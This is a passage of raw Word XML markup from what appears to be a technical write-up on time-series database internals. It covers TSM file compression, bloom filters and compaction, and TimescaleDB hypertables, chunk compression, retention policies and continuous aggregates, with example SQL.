        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C9177A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Blocks: compressed sequences of (timestamp, value) pairs for ONE series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9682C9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    All values for series "cpu,host=web01" stored contiguously</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F240CE0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Delta-encoded timestamps: store difference from previous timestamp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="750E9529" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      T1=1000, T2=1001, T3=1002 → stored as [1000, 1, 1] (deltas)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7D310B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    Gorilla compression for float values (Facebook's compression algorithm):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CCF433F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      XOR consecutive float64 values → store only changed bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56538FF7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">      CPU readings like 23.4, 23.5, 23.6 compress to near-zero extra bits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC6ECE4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Integer values: simple8b compression (pack multiple small ints into one int64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="107AD1D4" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D0742D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Index block: series_key → list of (min_timestamp, max_timestamp, file_offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2205CB19" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Enables: "does this file have data for series X in time range Y?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534D555F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Without reading data blocks: binary search through index</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D10ECD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6731C0E3" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Bloom filter: probabilistic "does series X exist in this file?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1AC50" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Eliminates index lookup for absent series</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FC6FD2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595AC7BE" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Compaction (background):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AADB8FD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Multiple small TSM files → merge into fewer, larger files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459E8A24" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  During merge: deduplicate, sort, recompress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2664D0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Similarity to LSM-Tree: files organized by recency/size levels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F66251" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7426A6D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Compression ratios (real-world):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DBC27B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Integer time series (counters): 10-20× compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC08EAC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Float time series (metrics): 4-8× compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2E39D8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Mixed workloads: 5-10× typical</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246DF9BF" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  100GB raw data → 10-20GB on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A12EBE8" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TimescaleDB's approach — extending PostgreSQL:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F0DCC1" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5197CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>TimescaleDB architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E397C73" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Runs inside PostgreSQL as an extension</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E680D9D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Automatic table partitioning via "hypertables"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18DEFE9A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDA271F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Hypertable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751BAD8B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Logical table behaves like regular PostgreSQL table to the application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41DDB32B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Internally: partitioned by time into "chunks" (sub-tables)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712F5441" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC04770" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE TABLE metrics (</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81570C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    time        TIMESTAMPTZ NOT NULL,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F54C83" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    device_id   INTEGER,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27851FAC" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    temperature FLOAT,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="391CDA68" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    humidity    FLOAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F3A837" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  );</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7889170D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT create_hypertable('metrics', 'time', chunk_time_interval =&gt; INTERVAL '1 day');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E463C18" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277C2DA0" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Chunk:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EF22D9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  One physical PostgreSQL table per time interval (e.g., one per day)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18C2DD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Stored as contiguous files on disk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F85E92" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0150C90E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Chunk 1: Jan 1 data (all rows with time </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∈</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve"> [Jan 1, Jan 2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133DD28A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Chunk 2: Jan 2 data (all rows with time </w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
        </w:rPr>
        <w:t>∈</w:t>
      </w:r>
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve"> [Jan 2, Jan 3))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C2B14E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5918D304" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28642229" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="247F5357" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Query for Jan 15 data → only opens Jan 15 chunk (excludes 364 other days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ACFF48" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Constraint exclusion: PostgreSQL's query planner skips non-matching chunks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECA3C5B" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Parallelism: different chunks scanned in parallel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A48AD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6142D19D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Chunk compression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B7059C9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Older chunks compressed automatically after configurable age (compress after 7 days)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0031677D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  Native columnar compression within chunks:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025BD65E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Each column stored separately (column-oriented within chunk)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183B9138" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    Values for same column are correlated → high compression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="403ED49E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456F8FB2" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT compress_chunk(c) FROM show_chunks('metrics', older_than =&gt; INTERVAL '7 days') c;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E87D2C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Or automatically via compression policy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6916F532" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT add_compression_policy('metrics', INTERVAL '7 days');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C974CD" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B92BD0E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Retention policies:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076BA119" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT add_retention_policy('metrics', INTERVAL '6 months');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470FFBD9" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Automatically drops chunks older than 6 months</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B3D7D69" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Dropping a chunk = deleting one file (instant) vs row-by-row DELETE (slow)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11010D39" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706502A5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t>Continuous aggregates (real-time materialized views):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2363F5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  CREATE MATERIALIZED VIEW metrics_hourly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBE9D1F" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  WITH (timescaledb.continuous) AS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E967C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT time_bucket('1 hour', time) AS bucket,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C000649" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">         device_id,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FE064C" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">         AVG(temperature) AS avg_temp,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27445B0A" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">         MAX(temperature) AS max_temp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046568C7" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  FROM metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41713B1D" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  GROUP BY bucket, device_id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF59071" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB30EC5" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  SELECT add_continuous_aggregate_policy('metrics_hourly',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424AA5F6" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    start_offset =&gt; INTERVAL '3 hours',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CD94BA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    end_offset =&gt; INTERVAL '1 hour',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCF6C8E" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">    schedule_interval =&gt; INTERVAL '1 hour');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398433EA" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC877EB" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- Downstream queries hit the materialized view (pre-aggregated)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68AD3907" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:r w:rsidRPr="005C5B1F">
        <w:t xml:space="preserve">  -- instead of raw data → 100-1000× faster for common dashboard queries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5871A665" w14:textId="77777777" w:rsidR="005C5B1F" w:rsidRPr="005C5B1F" w:rsidRDefault="005C5B1F" w:rsidP="005C5B1F">
      <w:pPr>
        <w:rPr>
